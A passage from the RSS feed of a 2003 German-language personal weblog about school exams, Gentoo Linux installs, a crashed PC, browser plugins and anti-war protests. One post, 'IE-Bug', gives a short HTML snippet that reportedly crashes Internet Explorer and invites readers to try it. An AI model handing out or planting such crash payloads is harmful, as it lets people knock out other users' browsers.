  13344.  <item>
  13345.    <title>Jaaaaaaaaaaaaa...</title>
  13346.    <link></link>
  13347.    <guid isPermaLink="true"></guid>
  13348.    <dc:creator>Andreas Jaggi</dc:creator>
  13349.    <creativeCommons:license></creativeCommons:license>
  13350.    <pubDate>Sat, 14 Jun 2003 11:36:00 +0200</pubDate>
  13351.    <category domain="">School</category>
  13352.    <description><![CDATA[Nun habe auch ich die Maturitätsprüfungen erfolgreich überlebt. Und mit mir auch alle anderen!<br>In der Regel fallen 2-3 durch, doch diesmal haben alle bestanden!<br>84 ist halt einfach der beste Jahrgang *g*
  13353. ]]></description>
  13354.    <content:encoded><![CDATA[Nun habe auch ich die Maturitätsprüfungen erfolgreich überlebt. Und mit mir auch alle anderen!<br>In der Regel fallen 2-3 durch, doch diesmal haben alle bestanden!<br>84 ist halt einfach der beste Jahrgang *g*
  13355. ]]></content:encoded>
  13356.  </item>
  13358.  <item>
  13359.    <title>Web Developer extension for Mozilla Firebird</title>
  13360.    <link></link>
  13361.    <guid isPermaLink="true"></guid>
  13362.    <dc:creator>Andreas Jaggi</dc:creator>
  13363.    <creativeCommons:license></creativeCommons:license>
  13364.    <pubDate>Wed, 11 Jun 2003 01:35:00 +0200</pubDate>
  13365.    <category domain="">Webdesign</category>
  13366.    <description><![CDATA[Ist mir gerade bei <a href=""><b>CSS-Technik-News</b></a> ins Auge gestochen, dass es jetzt noch weh tut: <a href=""><b>Web Developer extension for Mozilla Firebird</b></a>
  13367. ]]></description>
  13368.    <content:encoded><![CDATA[Ist mir gerade bei <a href=""><b>CSS-Technik-News</b></a> ins Auge gestochen, dass es jetzt noch weh tut: <a href=""><b>Web Developer extension for Mozilla Firebird</b></a>
  13369. ]]></content:encoded>
  13370.  </item>
  13372.  <item>
  13373.    <title>gammel</title>
  13374.    <link></link>
  13375.    <guid isPermaLink="true"></guid>
  13376.    <dc:creator>Andreas Jaggi</dc:creator>
  13377.    <creativeCommons:license></creativeCommons:license>
  13378.    <pubDate>Fri, 06 Jun 2003 00:43:00 +0200</pubDate>
  13379.    <category domain="">Misc</category>
  13380.    <description><![CDATA[Da's ja <a href=""><b>alle</b></a> <a href=""><b>Welt</b></a> macht, muss ich wohl mitziehen *g*
  13381. <br><a href=""><b>Southpark Selfmade</b></a><br>Via Drey, <a href=""><b>rw</b></a> und <a href=""><b>mk</b></a>
  13382. <br><br><img src="" alt="Gymnasium - Apathie erleben!" title="Gymnasium - Apathie erleben!">
  13383. ]]></description>
  13384.    <content:encoded><![CDATA[Da's ja <a href=""><b>alle</b></a> <a href=""><b>Welt</b></a> macht, muss ich wohl mitziehen *g*
  13385. <br><a href=""><b>Southpark Selfmade</b></a><br>Via Drey, <a href=""><b>rw</b></a> und <a href=""><b>mk</b></a>
  13386. <br><br><img src="" alt="Gymnasium - Apathie erleben!" title="Gymnasium - Apathie erleben!">
  13387. ]]></content:encoded>
  13388.  </item>
  13390.  <item>
  13391.    <title>Happy Birthday x-log</title>
  13392.    <link></link>
  13393.    <guid isPermaLink="true"></guid>
  13394.    <dc:creator>Andreas Jaggi</dc:creator>
  13395.    <creativeCommons:license></creativeCommons:license>
  13396.    <pubDate>Wed, 04 Jun 2003 13:34:00 +0200</pubDate>
  13397.    <category domain="">Misc</category>
  13398.    <description><![CDATA[Ich habe es natürlich wieder verschlafen:<br>Vorgestern vor einem Jahr hatte ich den ersten (Test)Eintrag, der unterdessen verschwunden ist, ins Weblog geschrieben. Der zweite Eintrag findet man <a href=""><b>hier</b></a>.<br>Nun habe ich schon ein Jahr lang das Internet mit meinem Gebrabel belästigt und habe nicht vor damit aufzuhören *fg*<br><br>Wer sich beschweren oder gratulieren will, voilà: happybirthday Affenschwanz x-log Punkt waterwave Punkt ch
  13399. <br><br>
  13400. <img src="" alt="Torte">
  13401. ]]></description>
  13402.    <content:encoded><![CDATA[Ich habe es natürlich wieder verschlafen:<br>Vorgestern vor einem Jahr hatte ich den ersten (Test)Eintrag, der unterdessen verschwunden ist, ins Weblog geschrieben. Der zweite Eintrag findet man <a href=""><b>hier</b></a>.<br>Nun habe ich schon ein Jahr lang das Internet mit meinem Gebrabel belästigt und habe nicht vor damit aufzuhören *fg*<br><br>Wer sich beschweren oder gratulieren will, voilà: happybirthday Affenschwanz x-log Punkt waterwave Punkt ch
  13403. <br><br>
  13404. <img src="" alt="Torte">
  13405. ]]></content:encoded>
  13406.  </item>
  13408.  <item>
  13409.    <title>Fuck</title>
  13410.    <link></link>
  13411.    <guid isPermaLink="true"></guid>
  13412.    <dc:creator>Andreas Jaggi</dc:creator>
  13413.    <creativeCommons:license></creativeCommons:license>
  13414.    <pubDate>Fri, 23 May 2003 21:41:00 +0200</pubDate>
  13415.    <category domain="">Tech</category>
  13416.    <description><![CDATA[Ich hab wieder einmal meinen Computer zu Schrott gemacht.<br>Als ich am CD-Brennen war, ist plötzlich alles eingefroren, nichteinmal ctrl+alt+backspace zum abscheissen von X hat funktioniert. Leider hat aber irgendetwas ununterbrochen auf die Festplatte zugegriffen. Als ich dann eine Stunde später wieder alles gleich vorfand, habe ich versucht mittels Büroklammer und diesem Resetlöchlein am CD-Brenner das Ding abzubrechen; ging in die Hose: irgendwie kam die CD ausm Gleichgewicht und hat im CD-Brenner zwar weiterhin gedreht, aber an allen Enden und Ecken angeschlagen, sprich CD-Brenner demoliert. Das hat natürlich nen riesigen Krach verursacht und so nach 5 Minuten konnt ichs nicht mehr länger ertragen, und auch meine Nachbarn hats wahrscheinlich nicht gerade gefreut (es war ca. Mitternacht). Also hab ich den Resetknopf am Gehäuse gedrückt, so dass die Festplatte immernoch mit Strom versorgt wurde -> vermutlich kein Headcrash.<br>Als das System neu bootete, verlief alles eigentlich normal, nur dass ich nach dem Login / nicht finden konnte also nix mit /sbin/shutdown -h etc. einfach weg. Also noch einmal resetet, und da wird der Kernel geladen, bis er dann mit dieser wunderschönen Fehlermeldung aufhört:<br><br>Kernel panic: VFS: Unable to mount root fs on 03:03<br><br>Und dann hab ich den Rechner abgestellt (am Netzteil) und den Stecker rausgezogen.
  13417. ]]></description>
  13418.    <content:encoded><![CDATA[Ich hab wieder einmal meinen Computer zu Schrott gemacht.<br>Als ich am CD-Brennen war, ist plötzlich alles eingefroren, nichteinmal ctrl+alt+backspace zum abscheissen von X hat funktioniert. Leider hat aber irgendetwas ununterbrochen auf die Festplatte zugegriffen. Als ich dann eine Stunde später wieder alles gleich vorfand, habe ich versucht mittels Büroklammer und diesem Resetlöchlein am CD-Brenner das Ding abzubrechen; ging in die Hose: irgendwie kam die CD ausm Gleichgewicht und hat im CD-Brenner zwar weiterhin gedreht, aber an allen Enden und Ecken angeschlagen, sprich CD-Brenner demoliert. Das hat natürlich nen riesigen Krach verursacht und so nach 5 Minuten konnt ichs nicht mehr länger ertragen, und auch meine Nachbarn hats wahrscheinlich nicht gerade gefreut (es war ca. Mitternacht). Also hab ich den Resetknopf am Gehäuse gedrückt, so dass die Festplatte immernoch mit Strom versorgt wurde -> vermutlich kein Headcrash.<br>Als das System neu bootete, verlief alles eigentlich normal, nur dass ich nach dem Login / nicht finden konnte also nix mit /sbin/shutdown -h etc. einfach weg. Also noch einmal resetet, und da wird der Kernel geladen, bis er dann mit dieser wunderschönen Fehlermeldung aufhört:<br><br>Kernel panic: VFS: Unable to mount root fs on 03:03<br><br>Und dann hab ich den Rechner abgestellt (am Netzteil) und den Stecker rausgezogen.
  13419. ]]></content:encoded>
  13420.  </item>
  13422.  <item>
  13423.    <title>Kein Titel</title>
  13424.    <link></link>
  13425.    <guid isPermaLink="true"></guid>
  13426.    <dc:creator>Andreas Jaggi</dc:creator>
  13427.    <creativeCommons:license></creativeCommons:license>
  13428.    <pubDate>Wed, 21 May 2003 10:26:00 +0200</pubDate>
  13429.    <category domain="">Misc</category>
  13430.    <description><![CDATA[Wieder einmal ein <a href=""><b>Screenshot</b></a>.
  13431. <br><br>
  13432. Chaos A.D.<br>Tanks On The Streets<br>Confronting Police<br>Bleeding The Plebs<br>Raging Crowd<br>Burning Cars<br>Bloodshed Starts<br>Who'll Be Alive?!<br><br>Chaos A.D.<br>Army In Siege<br>Total Alarm<br>I'm Sick Of This<br>Inside The State<br>War Is Created<br>No Man's Land<br>What Is This Shit?!<br><br>Refuse/resist<br>Refuse<br><br>Chaos A.D.<br>Disorder Unleashed<br>Starting To Burn<br>Starting To Lynch<br>Silence Means Death<br>Stand On Your Feet<br>Inner Fear<br>Your Worst Enemy<br><br>Refuse/resist
  13433. ]]></description>
  13434.    <content:encoded><![CDATA[Wieder einmal ein <a href=""><b>Screenshot</b></a>.
  13435. <br><br>
  13436. Chaos A.D.<br>Tanks On The Streets<br>Confronting Police<br>Bleeding The Plebs<br>Raging Crowd<br>Burning Cars<br>Bloodshed Starts<br>Who'll Be Alive?!<br><br>Chaos A.D.<br>Army In Siege<br>Total Alarm<br>I'm Sick Of This<br>Inside The State<br>War Is Created<br>No Man's Land<br>What Is This Shit?!<br><br>Refuse/resist<br>Refuse<br><br>Chaos A.D.<br>Disorder Unleashed<br>Starting To Burn<br>Starting To Lynch<br>Silence Means Death<br>Stand On Your Feet<br>Inner Fear<br>Your Worst Enemy<br><br>Refuse/resist
  13437. ]]></content:encoded>
  13438.  </item>
  13440.  <item>
  13441.    <title>Menuet OS</title>
  13442.    <link></link>
  13443.    <guid isPermaLink="true"></guid>
  13444.    <dc:creator>Andreas Jaggi</dc:creator>
  13445.    <creativeCommons:license></creativeCommons:license>
  13446.    <pubDate>Tue, 13 May 2003 18:27:00 +0200</pubDate>
  13447.    <category domain="">Linux</category>
  13448.    <description><![CDATA[Gerade beim <a href=""><b>Schockwellenreiter</b></a> entdeckt und ausprobiert: <a href=""><b>Menuet OS</b></a><br><br>Ein 32-Bit-Echtzeit-Betriebssystem mit GUI, komplett in Assembler geschrieben, welches auf einer einzigen Floppy Platz findet!
  13449. ]]></description>
  13450.    <content:encoded><![CDATA[Gerade beim <a href=""><b>Schockwellenreiter</b></a> entdeckt und ausprobiert: <a href=""><b>Menuet OS</b></a><br><br>Ein 32-Bit-Echtzeit-Betriebssystem mit GUI, komplett in Assembler geschrieben, welches auf einer einzigen Floppy Platz findet!
  13451. ]]></content:encoded>
  13452.  </item>
  13454.  <item>
  13455.    <title></title>
  13456.    <link></link>
  13457.    <guid isPermaLink="true"></guid>
  13458.    <dc:creator>Andreas Jaggi</dc:creator>
  13459.    <creativeCommons:license></creativeCommons:license>
  13460.    <pubDate>Mon, 05 May 2003 00:39:00 +0200</pubDate>
  13461.    <category domain="">School</category>
  13462.    <description><![CDATA[<a href=""><b></b></a> ist nun die Website unserer Klasse doch noch etwas geworden.<br>Zuerst schien es ja so, als ob nie mehr etwas geschehen würde, doch in der letzten Schulwoche (von drei Jahren) haben wir es doch noch geschafft ;-)<br><br>Ist 'quick and dirty' programmiert aber noch lange nicht fertig...
  13463. ]]></description>
  13464.    <content:encoded><![CDATA[<a href=""><b></b></a> ist nun die Website unserer Klasse doch noch etwas geworden.<br>Zuerst schien es ja so, als ob nie mehr etwas geschehen würde, doch in der letzten Schulwoche (von drei Jahren) haben wir es doch noch geschafft ;-)<br><br>Ist 'quick and dirty' programmiert aber noch lange nicht fertig...
  13465. ]]></content:encoded>
  13466.  </item>
  13468.  <item>
  13469.    <title>Gentoo</title>
  13470.    <link></link>
  13471.    <guid isPermaLink="true"></guid>
  13472.    <dc:creator>Andreas Jaggi</dc:creator>
  13473.    <creativeCommons:license></creativeCommons:license>
  13474.    <pubDate>Tue, 29 Apr 2003 20:58:00 +0200</pubDate>
  13475.    <category domain="">Linux</category>
  13476.    <description><![CDATA[<a href=""><b></b></a> mein kleines Shell-Script um die Installation von Gentoo etwas zu automatisieren *g*<br><br>Der erste Parameter ist der zu kompilierende Kernel (gentoo-sources, gaming-sources, vanilla-sourves oder was auch immer) default ist gentoo-sources. Der zweite Parameter legt fest, wohin gelogt wird, default ist /root/status. Der dritte Parameter legt fest, ob und welche make.conf nach /etc/make.conf kopiert wird.<br>Alle Parameter sind optional, will man jedoch den zweiten Parameter verwenden, so muss der erste auch gesetzt werden, ebenso für den dritten, aber das sollte eigentlich klar sein ;-)<br><br>Und ja, es ist keinsterweise irgendwie schön programmiert, da es nur mal so ein Versuch war, den aber gewisse Leute unbedingt sehen wollen *g*
  13477. ]]></description>
  13478.    <content:encoded><![CDATA[<a href=""><b></b></a> mein kleines Shell-Script um die Installation von Gentoo etwas zu automatisieren *g*<br><br>Der erste Parameter ist der zu kompilierende Kernel (gentoo-sources, gaming-sources, vanilla-sourves oder was auch immer) default ist gentoo-sources. Der zweite Parameter legt fest, wohin gelogt wird, default ist /root/status. Der dritte Parameter legt fest, ob und welche make.conf nach /etc/make.conf kopiert wird.<br>Alle Parameter sind optional, will man jedoch den zweiten Parameter verwenden, so muss der erste auch gesetzt werden, ebenso für den dritten, aber das sollte eigentlich klar sein ;-)<br><br>Und ja, es ist keinsterweise irgendwie schön programmiert, da es nur mal so ein Versuch war, den aber gewisse Leute unbedingt sehen wollen *g*
  13479. ]]></content:encoded>
  13480.  </item>
  13482.  <item>
  13483.    <title>Gentoo auf 486 mit Stage 1</title>
  13484.    <link></link>
  13485.    <guid isPermaLink="true"></guid>
  13486.    <dc:creator>Andreas Jaggi</dc:creator>
  13487.    <creativeCommons:license></creativeCommons:license>
  13488.    <pubDate>Sat, 26 Apr 2003 11:27:00 +0200</pubDate>
  13489.    <category domain="">Linux</category>
  13490.    <description><![CDATA[Da ich ja genügend Zeit habe, den Rechner dauernd laufen zu lassen, habe ich <a href=""><b>Gentoo</b></a> auf meinem alten 486er installiert, resp. bin noch dran ;-)<br><br>Und damit ich so weiss wie lange das ganze dauert habe ich ein simples Shell-Script geschrieben, dass mir die Bootstrap, emerge system, emerge sync, emerge -u world und emerge sys-kernel/gentoo-sources ausführt und jeweils die Uhrzeit in eine Datei schreibt. Herausgekommen ist nun folgendes:<br><br>Beginn Bootstrap<br>Wed Apr 23 03:49:00 CEST 2003<br>Beginn emerge system<br>Fri Apr 25 05:46:54 CEST 2003<br>Beginn emerge sync<br>Sat Apr 26 07:59:05 CEST 2003<br>Beginn emerge -u world<br>Sat Apr 26 08:21:35 CEST 2003<br>Beginn emerge sys-kernel/gentoo-sources<br>Sat Apr 26 08:21:35 CEST 2003<br>Finished<br>Sat Apr 26 09:18:42 CEST 2003<br><br>Natürlich dauerte das emerge system "nur" so kurz, weil es ein Minimalsystem ohne graphische Oberfläsche etc. ist, insgesamt 76 Packages!
  13491. ]]></description>
  13492.    <content:encoded><![CDATA[Da ich ja genügend Zeit habe, den Rechner dauernd laufen zu lassen, habe ich <a href=""><b>Gentoo</b></a> auf meinem alten 486er installiert, resp. bin noch dran ;-)<br><br>Und damit ich so weiss wie lange das ganze dauert habe ich ein simples Shell-Script geschrieben, dass mir die Bootstrap, emerge system, emerge sync, emerge -u world und emerge sys-kernel/gentoo-sources ausführt und jeweils die Uhrzeit in eine Datei schreibt. Herausgekommen ist nun folgendes:<br><br>Beginn Bootstrap<br>Wed Apr 23 03:49:00 CEST 2003<br>Beginn emerge system<br>Fri Apr 25 05:46:54 CEST 2003<br>Beginn emerge sync<br>Sat Apr 26 07:59:05 CEST 2003<br>Beginn emerge -u world<br>Sat Apr 26 08:21:35 CEST 2003<br>Beginn emerge sys-kernel/gentoo-sources<br>Sat Apr 26 08:21:35 CEST 2003<br>Finished<br>Sat Apr 26 09:18:42 CEST 2003<br><br>Natürlich dauerte das emerge system "nur" so kurz, weil es ein Minimalsystem ohne graphische Oberfläsche etc. ist, insgesamt 76 Packages!
  13493. ]]></content:encoded>
  13494.  </item>
  13496.  <item>
  13497.    <title>IE-Bug</title>
  13498.    <link></link>
  13499.    <guid isPermaLink="true"></guid>
  13500.    <dc:creator>Andreas Jaggi</dc:creator>
  13501.    <creativeCommons:license></creativeCommons:license>
  13502.    <pubDate>Wed, 23 Apr 2003 02:42:00 +0200</pubDate>
  13503.    <category domain="">Misc</category>
  13504.    <description><![CDATA[Bei <a href=""><b>rm</b></a> hab ich gerade 'n netten IE-Bug gefunden, der nur mit HTML den IE zum Absturz bringt.<br>Natürlich musste ich das gleich ausprobieren und nun seht selbst, was aufm Computer meiner Eltern (jep, bei mir hat es nur noch Linux!) passiert ist *eg*<br><br><a href=""><b>Screenshot</b></a><br><br><a href=""><b>Selber machen</b></a>
  13505. <br><br>
  13506. <pre>
  13507. &lt;html&gt;
  13508. &lt;form&gt;
  13509. &lt;input type crash&gt;
  13510. &lt;/form&gt;
  13511. &lt;/html&gt;
  13512. </pre>
  13513. ]]></description>
  13514.    <content:encoded><![CDATA[Bei <a href=""><b>rm</b></a> hab ich gerade 'n netten IE-Bug gefunden, der nur mit HTML den IE zum Absturz bringt.<br>Natürlich musste ich das gleich ausprobieren und nun seht selbst, was aufm Computer meiner Eltern (jep, bei mir hat es nur noch Linux!) passiert ist *eg*<br><br><a href=""><b>Screenshot</b></a><br><br><a href=""><b>Selber machen</b></a>
  13515. <br><br>
  13516. <pre>
  13517. &lt;html&gt;
  13518. &lt;form&gt;
  13519. &lt;input type crash&gt;
  13520. &lt;/form&gt;
  13521. &lt;/html&gt;
  13522. </pre>
  13523. ]]></content:encoded>
  13524.  </item>
  13526.  <item>
  13527.    <title>Ferienstress</title>
  13528.    <link></link>
  13529.    <guid isPermaLink="true"></guid>
  13530.    <dc:creator>Andreas Jaggi</dc:creator>
  13531.    <creativeCommons:license></creativeCommons:license>
  13532.    <pubDate>Sun, 20 Apr 2003 03:25:00 +0200</pubDate>
  13533.    <category domain="">Misc</category>
  13534.    <description><![CDATA[Nach Gymerfest und einer sonnigen Woche in Gumaglio im Maggiatal im Tessin, in der wir leider nur für die anstehenden Maturaprüfungen lernten, steht jetzt die zweite Ferienwoche bevor, in der ich wieder so viel zu tun habe, dass wahrscheinlich nicht mehr viel Zeit fürs Internet, Weblog etc. übrigbleibt.<br>Ich versuche nicht wie <a href=""><b>rm</b></a> gleich alles einzustellen (was für mich sicher auch die bessere Wahl wäre *g*), sondern quasi live ausm Prüffungsstress euch etwas mitzuteilen, dies jedoch nicht mehr so oft wie auch schon ;-)
  13535. ]]></description>
  13536.    <content:encoded><![CDATA[Nach Gymerfest und einer sonnigen Woche in Gumaglio im Maggiatal im Tessin, in der wir leider nur für die anstehenden Maturaprüfungen lernten, steht jetzt die zweite Ferienwoche bevor, in der ich wieder so viel zu tun habe, dass wahrscheinlich nicht mehr viel Zeit fürs Internet, Weblog etc. übrigbleibt.<br>Ich versuche nicht wie <a href=""><b>rm</b></a> gleich alles einzustellen (was für mich sicher auch die bessere Wahl wäre *g*), sondern quasi live ausm Prüffungsstress euch etwas mitzuteilen, dies jedoch nicht mehr so oft wie auch schon ;-)
  13537. ]]></content:encoded>
  13538.  </item>
  13540.  <item>
  13541.    <title>XPde</title>
  13542.    <link></link>
  13543.    <guid isPermaLink="true"></guid>
  13544.    <dc:creator>Andreas Jaggi</dc:creator>
  13545.    <creativeCommons:license></creativeCommons:license>
  13546.    <pubDate>Sat, 05 Apr 2003 17:44:00 +0200</pubDate>
  13547.    <category domain="">Linux</category>
  13548.    <description><![CDATA[Heute habe ich <a href=""><b>XPde</b></a> ausprobiert. Es ist ein dem Windows XP old-style Look nachempfundener Window-Manager.<br>Sieht nett aus, hat aber noch einige Bugs (daher ist es bei Portage auch noch gemasked).<br><br><a href=""><b>Monitorschuss?</b></a>
  13549. ]]></description>
  13550.    <content:encoded><![CDATA[Heute habe ich <a href=""><b>XPde</b></a> ausprobiert. Es ist ein dem Windows XP old-style Look nachempfundener Window-Manager.<br>Sieht nett aus, hat aber noch einige Bugs (daher ist es bei Portage auch noch gemasked).<br><br><a href=""><b>Monitorschuss?</b></a>
  13551. ]]></content:encoded>
  13552.  </item>
  13554.  <item>
  13555.    <title>Mozilla macht Kaffee</title>
  13556.    <link></link>
  13557.    <guid isPermaLink="true"></guid>
  13558.    <dc:creator>Andreas Jaggi</dc:creator>
  13559.    <creativeCommons:license></creativeCommons:license>
  13560.    <pubDate>Wed, 02 Apr 2003 22:40:00 +0200</pubDate>
  13561.    <category domain="">Linux</category>
  13562.    <description><![CDATA[Bei einigen Unix-Distributionen (Debian, Gentoo, Solaris...) will Mozilla/Phoenix nicht mit dem Plugin der auf dem System installierten Java-VM zusammenarbeiten und verlangt den Download einer eigenen Java-VM. Ich habe bisher schon viele verschiedenen Lösungsansätze gesehen, jedoch hat bei mir noch keiner funktioniert :-)<br>Vorhin jedoch ist über die LUGS-Mailingliste gerade einer ins Postfach geflattert, der so simpel wie funktionstüchtig ist:<br><br>Anstatt die ganze Plugin-Geschichte herumzukopieren oder herumzuinstallieren, macht man einfach im /usr/lib/phoenix/plugins oder /usr/lib/mozilla/plugins Verzeichnis einen Link ( zu /JAVAPFAD/xx/yy/zz/, variert je nach Distribution und Java-VM!<br><br>Bei mir funktioniert nun Java endlich auch im Phoenix *freu*
  13563. ]]></description>
  13564.    <content:encoded><![CDATA[Bei einigen Unix-Distributionen (Debian, Gentoo, Solaris...) will Mozilla/Phoenix nicht mit dem Plugin der auf dem System installierten Java-VM zusammenarbeiten und verlangt den Download einer eigenen Java-VM. Ich habe bisher schon viele verschiedenen Lösungsansätze gesehen, jedoch hat bei mir noch keiner funktioniert :-)<br>Vorhin jedoch ist über die LUGS-Mailingliste gerade einer ins Postfach geflattert, der so simpel wie funktionstüchtig ist:<br><br>Anstatt die ganze Plugin-Geschichte herumzukopieren oder herumzuinstallieren, macht man einfach im /usr/lib/phoenix/plugins oder /usr/lib/mozilla/plugins Verzeichnis einen Link ( zu /JAVAPFAD/xx/yy/zz/, variert je nach Distribution und Java-VM!<br><br>Bei mir funktioniert nun Java endlich auch im Phoenix *freu*
  13565. ]]></content:encoded>
  13566.  </item>
  13568.  <item>
  13569.    <title>April, April!</title>
  13570.    <link></link>
  13571.    <guid isPermaLink="true"></guid>
  13572.    <dc:creator>Andreas Jaggi</dc:creator>
  13573.    <creativeCommons:license></creativeCommons:license>
  13574.    <pubDate>Tue, 01 Apr 2003 00:25:00 +0200</pubDate>
  13575.    <category domain="">Misc</category>
  13576.    <description><![CDATA[Für alle, die sich morgen über die abstrusesten Zeitungsartikel wundern.
  13577. ]]></description>
  13578.    <content:encoded><![CDATA[Für alle, die sich morgen über die abstrusesten Zeitungsartikel wundern.
  13579. ]]></content:encoded>
  13580.  </item>
  13582.  <item>
  13583.    <title>uptime</title>
  13584.    <link></link>
  13585.    <guid isPermaLink="true"></guid>
  13586.    <dc:creator>Andreas Jaggi</dc:creator>
  13587.    <creativeCommons:license></creativeCommons:license>
  13588.    <pubDate>Sat, 29 Mar 2003 15:13:00 +0100</pubDate>
  13589.    <category domain="">Linux</category>
  13590.    <description><![CDATA[<a href=""><b>uptime</b></a>
  13591. ]]></description>
  13592.    <content:encoded><![CDATA[<a href=""><b>uptime</b></a>
  13593. ]]></content:encoded>
  13594.  </item>
  13596.  <item>
  13597.    <title>Informationen zum Thema Spam</title>
  13598.    <link></link>
  13599.    <guid isPermaLink="true"></guid>
  13600.    <dc:creator>Andreas Jaggi</dc:creator>
  13601.    <creativeCommons:license></creativeCommons:license>
  13602.    <pubDate>Sat, 29 Mar 2003 01:28:00 +0100</pubDate>
  13603.    <category domain="">Misc</category>
  13604.    <description><![CDATA[Aus aktuellen Anlass (ich habe Spam direkt von der Domain unserer Schule bekommen!) habe ich mich noch einmal ein bisschen umgeschaut und bin auch fündig geworden.<br><br><a href=""><b>Informationen zum Thema Spam (inkl. Antwortvorlage für die Schweiz!)</b></a><br><a href="#" class="gone"><b>Artikel im Saldo (kostenpflichtig)</b></a>
  13605. ]]></description>
  13606.    <content:encoded><![CDATA[Aus aktuellen Anlass (ich habe Spam direkt von der Domain unserer Schule bekommen!) habe ich mich noch einmal ein bisschen umgeschaut und bin auch fündig geworden.<br><br><a href=""><b>Informationen zum Thema Spam (inkl. Antwortvorlage für die Schweiz!)</b></a><br><a href="#" class="gone"><b>Artikel im Saldo (kostenpflichtig)</b></a>
  13607. ]]></content:encoded>
  13608.  </item>
  13610.  <item>
  13611.    <title>SelfLinux</title>
  13612.    <link></link>
  13613.    <guid isPermaLink="true"></guid>
  13614.    <dc:creator>Andreas Jaggi</dc:creator>
  13615.    <creativeCommons:license></creativeCommons:license>
  13616.    <pubDate>Fri, 28 Mar 2003 01:18:00 +0100</pubDate>
  13617.    <category domain="">Linux</category>
  13618.    <description><![CDATA[So wie <a href=""><b>SelfHTML</b></a> für HTML gibt es auch <a href=""><b>SelfLinux</b></a>. Befindet sich momentan noch im Aufbau, bietet aber trotzdem schon einige nützliche Informationen.
  13619. ]]></description>
  13620.    <content:encoded><![CDATA[So wie <a href=""><b>SelfHTML</b></a> für HTML gibt es auch <a href=""><b>SelfLinux</b></a>. Befindet sich momentan noch im Aufbau, bietet aber trotzdem schon einige nützliche Informationen.
  13621. ]]></content:encoded>
  13622.  </item>
  13624.  <item>
  13625.    <title>Bush, Blair, assasins, mais l'ONU ne fait rien!</title>
  13626.    <link></link>
  13627.    <guid isPermaLink="true"></guid>
  13628.    <dc:creator>Andreas Jaggi</dc:creator>
  13629.    <creativeCommons:license></creativeCommons:license>
  13630.    <pubDate>Wed, 26 Mar 2003 23:34:00 +0100</pubDate>
  13631.    <category domain="">Misc</category>
  13632.    <description><![CDATA[<p><a href=""><b>Chronik eines angekündigten Krieges</b></a></p><p><a href=""><b>PACE</b></a></p><p><a href=""><b>WANTED</b></a></p><p>Weitere PDFs zur Weltpolitik findet man <a href=""><b>hier</b></a> und <a href=""><b>hier</b></a>.</p>
  13633. ]]></description>
  13634.    <content:encoded><![CDATA[<p><a href=""><b>Chronik eines angekündigten Krieges</b></a></p><p><a href=""><b>PACE</b></a></p><p><a href=""><b>WANTED</b></a></p><p>Weitere PDFs zur Weltpolitik findet man <a href=""><b>hier</b></a> und <a href=""><b>hier</b></a>.</p>
  13635. ]]></content:encoded>
  13636.  </item>
  13638.  <item>
  13639.    <title>So siehts aus</title>
  13640.    <link></link>
  13641.    <guid isPermaLink="true"></guid>
  13642.    <dc:creator>Andreas Jaggi</dc:creator>
  13643.    <creativeCommons:license></creativeCommons:license>
  13644.    <pubDate>Sun, 23 Mar 2003 21:27:00 +0100</pubDate>
  13645.    <category domain="">Misc</category>
  13646.    <description><![CDATA[<a href="" title=" (">gi</a> hat ein <a href="#" class="gone"><b>Bild</b></a> der Welt gemacht.
  13647. ]]></description>
  13648.    <content:encoded><![CDATA[<a href="" title=" (">gi</a> hat ein <a href="#" class="gone"><b>Bild</b></a> der Welt gemacht.
  13649. ]]></content:encoded>
  13650.  </item>
  13652.  <item>
  13653.    <title>Tous ensemble, tous ensemble, non à la guerre!</title>
  13654.    <link></link>
  13655.    <guid isPermaLink="true"></guid>
  13656.    <dc:creator>Andreas Jaggi</dc:creator>
  13657.    <creativeCommons:license></creativeCommons:license>
  13658.    <pubDate>Sat, 22 Mar 2003 21:17:00 +0100</pubDate>
  13659.    <category domain="">Misc</category>
  13660.    <description><![CDATA[Jeudi et vendredi j'étais à Lausanne pour visiter les 'journées des gymnasien(ne)s' à l'<a href=""><b>EPFL</b></a>. Bon, je pense que je ferais là mes études.<br>Déjà à 9 heures le matin, en traversant la place de la gare on entendait 'les voix de la manifestation' mais je n'avais pas le temps pour y participer. Le vendredi je me suis bien informé sur les études en informatique. Donc aujoud'hui je suis allé à Berne à la <a href=""><b>manifestation nationale contre la guerre</b></a>.
  13661. ]]></description>
  13662.    <content:encoded><![CDATA[Jeudi et vendredi j'étais à Lausanne pour visiter les 'journées des gymnasien(ne)s' à l'<a href=""><b>EPFL</b></a>. Bon, je pense que je ferais là mes études.<br>Déjà à 9 heures le matin, en traversant la place de la gare on entendait 'les voix de la manifestation' mais je n'avais pas le temps pour y participer. Le vendredi je me suis bien informé sur les études en informatique. Donc aujoud'hui je suis allé à Berne à la <a href=""><b>manifestation nationale contre la guerre</b></a>.
  13663. ]]></content:encoded>
  13664.  </item>
  13666.  <item>
  13667.    <title>Auch Programmierer sind Menschen</title>
  13668.    <link></link>
  13669.    <guid isPermaLink="true"></guid>
  13670.    <dc:creator>Andreas Jaggi</dc:creator>
  13671.    <creativeCommons:license></creativeCommons:license>
  13672.    <pubDate>Sun, 16 Mar 2003 13:42:00 +0100</pubDate>
  13673.    <category domain="">Coding</category>
  13674.    <description><![CDATA[<span style="font-family: monospace; font-size: 1em;">checking for something to drink while compiling... err: no fridge found</span><br><br>Ist mir gerade beim installieren von <a href=""><b>TiLP</b></a> aufgefallen :-)
  13675. ]]></description>
  13676.    <content:encoded><![CDATA[<span style="font-family: monospace; font-size: 1em;">checking for something to drink while compiling... err: no fridge found</span><br><br>Ist mir gerade beim installieren von <a href=""><b>TiLP</b></a> aufgefallen :-)
  13677. ]]></content:encoded>
  13678.  </item>
  13680.  <item>
  13681.    <title>Tada</title>
  13682.    <link></link>
  13683.    <guid isPermaLink="true"></guid>
  13684.    <dc:creator>Andreas Jaggi</dc:creator>
  13685.    <creativeCommons:license></creativeCommons:license>
  13686.    <pubDate>Wed, 12 Mar 2003 15:09:00 +0100</pubDate>
  13687.    <category domain="">Linux</category>
  13688.    <description><![CDATA[Nachdem ich letztens meine Platte zerlöchert habe, hab ich nun alles Partitionen darauf platt gemacht und  Gentoo ganz neu installiert.<br><br><a href=""><b>Screenshot</b></a>
  13689. ]]></description>
  13690.    <content:encoded><![CDATA[Nachdem ich letztens meine Platte zerlöchert habe, hab ich nun alles Partitionen darauf platt gemacht und  Gentoo ganz neu installiert.<br><br><a href=""><b>Screenshot</b></a>
  13691. ]]></content:encoded>
  13692.  </item>
  13694.  <item>
  13695.    <title>Heisenbergsche Raum-Zeit-Unschärfe</title>
  13696.    <link></link>
